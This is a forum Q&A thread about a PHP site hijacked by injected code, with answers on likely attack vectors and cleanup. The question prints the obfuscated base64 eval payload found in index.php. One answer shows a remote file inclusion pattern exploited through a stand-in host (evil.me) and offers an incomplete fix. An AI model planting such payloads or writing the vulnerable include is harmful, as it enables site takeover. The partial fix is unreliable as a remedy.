PHP: I got hacked...

Question

I just checked my site it suddenly jumps me to this site:

xxxp://www1.re*******3.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfaFbVoKDb2YmHWJjOxaCbkXp%2FWqyopHaYXsiaY2eRaGNpnFPVpJHaotahiaJ0WKrO1c%2Beb1qfnaSZdV%2FXlsndblaWpG9plmGQYWCcW5eakWppWKjKx6ChpqipbmdjpKjEjtDOoKOhY56n1pLWn1%2FZodXN02BdpqmikpVwZWpxZGxpcV%2FVoJajYmJkZ2hwlGGXaVbJkKC0q1eum5qimZxx

I found out that in the first line of my index.php file, that looks like this:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHR/*

Snip

*/DkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>

How do I stop this? thanks!

UPDATE: What kind of attack is this? is this really xss? No one really knows about my ftp password.

Answer 1

Just remove this line, and patch your server up. Most likely you are infected by backdoor.

Answer 2

Remove the line of code?

This is an attack on your server that allowed the attacker to alter the server files. This can be through folder permissions (having a 777 permission is bad), or if you allow your scripts to alter other scripts on your server.

You might want to look over your folder permissions.

Answer 3

Most people stop code injection attacks by removing the viral code first, and then making all PHP files read only while looking for the exploit that the attack used to write to your PHP files.

Answer 4

Someone has access (not through xss or sql-injection) to your php files on your server. If this is a shared server it is very possible that the entire server was compromised somehow. You can remove that crap at the top of your php files, and make them read-only. However, as I'm guessing this is a shared server, if your web host doesn't fix the security flaw that allowed this in the first place, it may not be enough. Talk to your hosting provider (personally I'd just move to a new provider, this is a good sign that these guys are hopeless.)

Answer 5

Most of time it's ftp passwords stolen from the developer's PC by some trojan program

Answer 6

Secure your server, try contacting the relevant people, the server seems to have been compromised.

Answer 7

What kind of attack is this? is this really xss? No one really knows about my ftp password.

There are several vectors for this kind of attack:

Software vulnerability. This could include outdated PHP, MySQL, Apache or just about anything else running. The entire server may have been comprimised.

Scripting vulnerability. A vulnerability, usually with a widely used PHP application used to upload and execute commands. A common one is in photo gallery software that is tricked into uploading renamed php files, allowing the extension to be renamed on the server from jpg back to the original php, and then run, allowing for any action allowed by scripts (usually a PHP admin/root kit is uploaded this way giving the attacker the ability to freely upload and alter files)

FTP brute force attack. Generally your server should be configured to be able to IP block address that make repeated failed login attempts.

User infection. A relatively new vector of attack, a trojan (most so far use vulnerabilities in the Adobe PDF Reader plugin due the fact that this works in FireFox but any browser exploit that allows code execution will work) to install a trojan onto a passing users computer. The trojan searches the users computer for common FTP programs like Filezilla and Dreamweaver, looking for saved passwords. Once it locates an FTP login it accesses that site from the users own computer and attempts to modify known file types (htm,php,asp,etc), inserting it's own code (most search for the HEAD tag and insert just after that) - the same code that originally infected the users computer. Once it is done it can work like any other trojan (install adware, or stay hidden and make the users computer part of a botnet).

Answer 8

We had the same problem. Really ashamed to admit, but it happened to us because users were able to upload files with any extension and run them on server. So, some user had uploaded php script and executed it. :-)

We've solved problem by setting filters and read-only attributes on uploaded files.

Answer 9

If you have open_wrappers = on, and you are using something like this somewhere on the site

http://domain.tld/index.php?page=somenameofpage

Somewhere in index.php (or included files)

<?php

include($page . '.php');

?>

Then somebody could compromise your site by requesting

http://domain.tld/index.php?page=http://evil.me/evilcode.txt?

(value of page should be urlencoded to work - i'm lazy so didn't urlencode it. Note the ? at the end..

What you are now actually including is

http://evil.me/evilcode.txt?.php

-- evilcode.txt --

<?php

echo 'some evil code huh!';

This vil execute the php code in evilcode.txt

A quickfix would be to add a . to the path of the include - like this

include('./' . $page . '.php');

I learned this the hard way.. Became admin of a existing site that used this method for navigation. Took me months to figure it out, eventhough the hacker didn't replaced any code - he just added files in some subfolders. And yeah, he added some backdoors in a .js and .css filse that a users AntiVir picked up.